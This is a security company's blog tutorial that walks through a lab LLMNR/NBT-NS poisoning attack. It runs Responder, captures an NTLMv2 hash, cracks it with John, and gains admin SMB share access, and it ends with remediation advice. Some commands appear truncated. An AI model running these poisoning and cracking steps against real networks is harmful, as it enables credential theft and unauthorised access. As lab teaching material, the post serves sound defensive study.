Tabla de contenidos

Title
Title
Tabla de contenidos
Tabla de contenidos
Tabla de contenidos
Title
Title
Title

Blog

Ataques

Attacking a network using Responder

Jonathan Armas

Jonathan Armas

Analista de seguridad

Actualizado

31 mar 2020

7 min

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are two name resolution protocols that help Windows hosts to find address names from other devices on the network. These are Windows components and are alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS), it uses a simple exchange of request and response messages to resolve computer names on IPV6 or IPV4 addresses.

NBT-NS uses NetBIOS to resolve IPV4 addresses by broadcasting a NetBIOS Name Query Request message to the local subnet broadcast address using the port UDP 137. The node that owns the queried name then sends back a unicast message to the requestor. If NBT-NS is disabled then it will need to use DNS queries to resolve names, and if the network does not have DNS servers then the names should be in the Hosts file of the machine.

LLMNR messages use a similar format to DNS messages but use UDP port 5355. It works by sending a LLMNR Name Query Request message to the multicast address, this multicast address is scoped to prevent a multicast enabler router from forwarding the request outside the requestor subnet. If a host on the subnet is authoritative for the request name it sends a unicast response to the requestor.

As both protocols use broadcast messages to resolve names on the network, an attacker can listen to them and then respond with a spoof of an authoritative source for name resolution as if he knew the requested name. Then with the service poisoned, the victim will continue the communication with the attacker, and if the network resource needs authentication, the victim will send a username and an NTLMv2 hash. Here the attacker can use tools like JohnTheRipper to crack the credentials and have access to the system. This attack is called LLMNR/NBT-NS Poisoning and Relay.

Responder lab

To set up our lab we are going to use Hashicorp's Vagrant; the source files are below. Create a folder with the name requestor and save the Vagrantfile there. Also create another folder inside requestor named provision and save the file ad.ps1 there.

setting up the lab.

$ mkdir requestor
$ cd requestor
requestor$ nano Vagrantfile #Add here the content
requestor$ mkdir provision
requestor$ nano provision/ad.ps1 #Add here the content

Vagrantfile.

# -*- mode: ruby -*-
# vi: set ft=ruby :

Vagrant.configure("2") do |config|

  config.vm.box = "cdaf/WindowsServerDC"
  config.vm.hostname = "winserver"
  config.vm.network "private_network", ip: "192.168.56.2"
  config.vm.provision "shell", path: "provision/ad.ps1"

end

provision/ad.ps1.

Then run the environment using:

vagrant up.

requestor$ vagrant

This will create a Windows machine with Active Directory installed and configured. At this point, everything we need has been completed and is ready for us to launch an attack.

Now we can set up our attacking machine. Here we are using Kali Linux with Vagrant too, but you can use whatever OS you prefer.

These are the tools that we are going to use:

If you are using Kali, the only thing that needs to be cloned is Responder.

cloning Responder.

git

We are ready to go.

Starting the poisoner

The only thing we need to do is to run Responder as a root. We can do this with the following:

running Responder.

Responder$ sudo ./Responder.py -I eth1 -wrf

Responder.

NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie
To kill this script hit CRTL-C


[+] Poisoners:
LLMNR                      [ON]
NBT-NS                     [ON]
DNS/MDNS                   [ON]

[+] Servers:
HTTP server                [ON]
HTTPS server               [ON]
WPAD proxy                 [ON]
SMB server                 [ON]
Kerberos server            [ON]
SQL server                 [ON]
FTP server                 [ON]
IMAP server                [ON]
POP3 server                [ON]
SMTP server                [ON]
DNS server                 [ON]
LDAP server                [ON]

[+] HTTP Options:
Always serving EXE         [OFF]
Serving EXE                [OFF]
Serving HTML               [OFF]
Upstream Proxy             [OFF]

[+] Poisoning Options:
Analyze Mode               [OFF]
Force WPAD auth            [OFF]
Force Basic Auth           [OFF]
Force LM downgrade         [OFF]
Fingerprint hosts          [ON]

[+] Generic Options:
Responder NIC              [eth1]
Responder IP               [192.168.56.103]
Challenge set              [1122334455667788]



[+] Listening for

Since we are on the same network, it is only a matter of time to get a request from a machine in the subnet. But because our Windows machine is doing nothing, we will receive nothing.

Capturing credentials

Now let’s act like a normal user in our Windows machine. Log in as svctest with the domain sky.net and password Monkey.123, then open the start menu and there type run. In there we are going to look for a name on the network, just type the following:

searching names.

There we will get an error accessing the share, but in our attacker machine we will get the following:
Responder output.
[*] [LLMNR]  Poisoned answer sent to 192.168.56.2 for name FLUIDATTACKS
[FINGER] OS Version     : Windows Server 2016 Standard Evaluation 14393
[FINGER] Client Version : Windows Server 2016 Standard Evaluation 6.3
[SMB] NTLMv2-SSP Client   : 192.168.56.2
[SMB] NTLMv2-SSP Username : SKY\svctest
[SMB] NTLMv2-SSP Hash     : svctest::SKY:1122334455667788:D78BEB50968B6AEA3D8A9CD04765BB6A:01010000000000008274E5E0A507D60176E66DEAF12162F90000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000037AE67261C1D6D0CEBBD9D3AA1803818C033512B8B0FD6DEBA539CFD272D615B0A001000000000000000000000000000000000000900220063006900660073002F0046004C00550049004400410054005400410043004B0053000000000000000000
[SMB] Requested Share     : \\FLUIDATTACKS\IPC$
[*] [LLMNR]  Poisoned answer sent to 192.168.56.2 for name FLUIDATTACKS
[FINGER] OS Version     : Windows Server 2016 Standard Evaluation 14393
[FINGER] Client Version : Windows Server 2016 Standard Evaluation 6.3
[*] Skipping previously captured hash for SKY\svctest
[SMB] Requested Share     : \\FLUIDATTACKS\IPC$
Responder result
Responder result.
Here we have our hash, they are NTLMv2 hashes, and there we can also view some information about the server like the OS version and the requested share. With this, we save that user’s hash on a file.
save hash.
echo 'svctest::SKY:1122334455667788:D78BEB50968B6AEA3D8A9CD04765BB6A:01010000000000008274E5E0A507D60176E66DEAF12162F90000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000037AE67261C1D6D0CEBBD9D3AA1803818C033512B8B0FD6DEBA539CFD272D615B0A001000000000000000000000000000000000000900220063006900660073002F0046004C00550049004400410054005400410043004B0053000000000000000000'
And then we crack it using John, a SecLists dictionary, and KoreLogic ruleset. Since NTLMv2 hashes are harder to crack, it could take a while, depending on your system.
John cracking.
john --wordlist=/usr/share/seclists/Passwords/darkweb2017-top100.txt --rules
John output.
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Monkey.123       (svctest)
1g 0:00:00:18 DONE (2020-03-31 17:55) 0.05518g/s 575858p/s 575858c/s 575858C/s Asdfgh.jkl13..Asdfgh.jkl24
Use the "--show --format=netntlmv2"


And it’s cracked! Now we can check our access running smbmap again with our new set of credentials.
samba high privileges.
smbmap -u svctest -p 'Monkey.123' -d sky.net -H 192
admin smbmap.
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.56.2...
[+] IP: 192.168.56.2:445        Name: 192.168.56.2
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  READ, WRITE
        C$                                                      READ, WRITE
        IPC$                                                    READ ONLY
        NETLOGON                                                READ, WRITE
        SYSVOL                                                  READ, WRITE
        [!] Unable to remove test directory at \\192


As you can see, we now have administrative access to our server. You can access it by RDP or retrieve files using SMB. Also, you can dump the SAM to get more users and hashes; these last ones are NTLMv1 and easily cracked.
This could be done using the reqtest account or the vagrant account. If an attacker does this in an enterprise network, he can capture any number of accounts of the network. Also, there are windows scripts like Inveigh, where we can do more or less the same attack with the same results.
Solution
The remediation for this attack is to disable both LLMNR and NBT-NS on all hosts because Windows defaults to one when the other fails or is disabled. A host based security software that blocks LLMNR/NBT-NS requests could also be used.
Another way to mitigate this is by having and using a strong credential policy. Passwords must be longer than 20 characters, contain upper and lower case letters, contain symbols and digits, and must not be easy to guess. This means you would be wise to adopt passphrases instead of simple passwords.
This is especially useful when you are dealing with service credentials because they are the ones most targeted. You can also set an alert to notify you when someone is logged in with your most critical and high-privileged users.
If you want more information about strong credentials, you can check our Criteria about them.
Get started with Fluid Attacks' PTaaS right now
Leer más
Etiquetas:
ciberseguridad
windows
vulnerabilidad
credenciales
Suscríbete a nuestro boletín
Mantente al día sobre nuestros próximos eventos y los últimos blog posts, advisories y otros recursos interesantes.
Suscribirse
Otros posts
portada-gen-ai-en-pentesting-investigacion-empirica
Ataques
Felipe Ruiz
24 de abril de 2025
Ventajas y desventajas de GenAI en pentesting: conclusiones de una investigación empírica
Leer post
portada-vulnerabilidad-en-tj-actions-changed-files
Ataques
Felipe Ruiz
20 de marzo de 2025
Llamada de atención para GitHub Actions por vulnerabilidad en tj-actions/changed-files
Leer post
portada-ataques-al-sector-transporte
Ataques
Felipe Ruiz
6 de febrero de 2025
Ataques al sector del transporte: 10 brechas de seguridad críticas recientes
Leer post
portada-filtraciones-datos-sector-minorista
Ataques
Felipe Ruiz
21 de octubre de 2024
Filtraciones de datos en el sector minorista: Los siete ciberataques más exitosos
Leer post
portada-riesgos-seguridad-aplicaciones-web
Ataques
Wendy Rodriguez
16 de agosto de 2024
Riesgos de seguridad para aplicaciones web: Ataques complejos y medidas proactivas
Leer post
portada-mayores-violaciones-datos-sector-financiero
Ataques
Wendy Rodriguez
6 de junio de 2024
Las 8 mayores violaciones de datos en el sector financiero
Leer post
portada-10-mayores-violaciones-de-datos
Ataques
Wendy Rodriguez
11 de abril de 2024
Las 10 mayores violaciones de datos de la historia
Leer post
portada-prevenir-ransomware
Ataques
Wendy Rodriguez
3 de abril de 2024
Cómo prevenir ataques de ransomware: La mejor ofensa es una buena defensa
Leer post
Inicia tu prueba gratuita de 21 días
Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.
Prueba gratis
Contactar a ventas
Inicia tu prueba gratuita de 21 días
Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.
Prueba gratis
Contactar a ventas
Inicia tu prueba gratuita de 21 días
Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.
Prueba gratis
Contactar a ventas
Inicia tu prueba gratuita de 21 días
Descubre los beneficios de nuestra solución Hacking Continuo, de la que ya disfrutan empresas de todos los tamaños.
Prueba gratis
Contactar a ventas
Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.
Productos
Plataforma
SAST
DAST
SCA
CSPM
PTaaS
Revisión de código seguro
Ingeniería inversa
Soluciones
Hacking Continuo
AppSec
Seguridad en la nube
ASPM
RBVM
SSCS
Cumplimiento
DevSecOps
Objetivos
Aplicaciones web
Aplicaciones móviles
API y microservicios
Contenedores
IaC
Infraestructura en la nube
Recursos
Advisories
Blog
Descargables
Fundamentos
Eventos
Documentación
Cursos
Compañía
Quiénes somos
Clientes
Certificaciones
Aliados
Trabaja con nosotros
SOC 2 Type II
SOC 3
Suscríbete a nuestro boletín
Mantente al día sobre nuestros próximos eventos y los últimos blog posts, advisories y otros recursos interesantes.
Suscribirse
© 2025 Fluid Attacks. We hack your software.
Términos de uso
Política de privacidad
Estado del sistema
Política de cookies
Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.
Productos
Plataforma
SAST
DAST
SCA
CSPM
PTaaS
Revisión de código seguro
Ingeniería inversa
Soluciones
Hacking Continuo
AppSec
Seguridad en la nube
ASPM
RBVM
SSCS
Cumplimiento
DevSecOps
Objetivos
Aplicaciones web
Aplicaciones móviles
API y microservicios
Contenedores
IaC
Infraestructura en la nube
Recursos
Advisories
Blog
Descargables
Fundamentos
Eventos
Documentación
Cursos
Compañía
Quiénes somos
Clientes
Certificaciones
Aliados
Trabaja con nosotros
SOC 2 Type II
SOC 3
Suscríbete a nuestro boletín
Mantente al día sobre nuestros próximos eventos y los últimos blog posts, advisories y otros recursos interesantes.
Suscribirse
© 2025 Fluid Attacks. We hack your software.
Términos de uso
Política de privacidad
Estado del sistema
Política de cookies
Las soluciones de Fluid Attacks permiten a las organizaciones identificar, priorizar y remediar vulnerabilidades en su software a lo largo del SDLC. Con el apoyo de la IA, herramientas automatizadas y pentesters, Fluid Attacks acelera la mitigación de la exposición al riesgo de las empresas y fortalece su postura de ciberseguridad.
Productos
Plataforma
SAST
DAST
SCA
CSPM
PTaaS
Revisión de código seguro
Ingeniería inversa
Soluciones
Hacking Continuo
AppSec
Seguridad en la nube
ASPM
RBVM
SSCS
Cumplimiento
DevSecOps
Objetivos
Aplicaciones web
Aplicaciones móviles
API y microservicios
Contenedores
IaC
Infraestructura en la nube
Recursos
Advisories
Blog
Descargables
Fundamentos
Eventos
Documentación
Cursos
Compañía
Quiénes somos
Clientes
Certificaciones
Aliados
Trabaja con nosotros
SOC 2 Type II
SOC 3
Suscríbete a nuestro boletín
Mantente al día sobre nuestros próximos eventos y los últimos blog posts, advisories y otros recursos interesantes.
Suscribirse
© 2025 Fluid Attacks. We hack your software.
Términos de uso
Política de privacidad
Estado del sistema
Política de cookies
Planes
Advisories
ES
Contactar a ventas
Iniciar sesión
Prueba gratis
ES
ES
Contactar a ventas
Prueba gratis
Planes
Advisories
ES
Contactar a ventas
Iniciar sesión
Prueba gratis